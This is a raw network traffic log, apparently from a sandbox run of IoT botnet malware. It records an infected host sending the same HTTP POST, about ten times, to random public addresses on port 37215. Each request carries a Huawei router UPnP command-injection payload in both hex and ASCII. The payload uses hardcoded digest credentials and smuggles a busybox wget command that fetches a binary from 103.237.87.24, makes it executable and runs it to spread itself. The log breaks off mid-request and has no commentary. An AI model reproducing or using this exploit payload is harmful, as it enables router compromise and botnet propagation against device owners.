2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1830192.168.2.1342052157.27.138.15937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.545574903 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1831192.168.2.1355236139.204.100.8137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.545588017 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1832192.168.2.1335532197.52.74.14837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.545588017 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1833192.168.2.1360248200.106.60.6837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.545703888 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1834192.168.2.135964841.222.45.1737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.545705080 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1835192.168.2.1357414197.37.16.7237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.545707941 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1836192.168.2.135599241.54.59.11337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.545710087 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1837192.168.2.1343668197.93.110.19837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.545907021 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1838192.168.2.1341098142.156.188.8337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.546349049 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1839192.168.2.1359432197.149.9.21737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.546351910 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1840192.168.2.1337834112.31.62.24837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.546359062 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
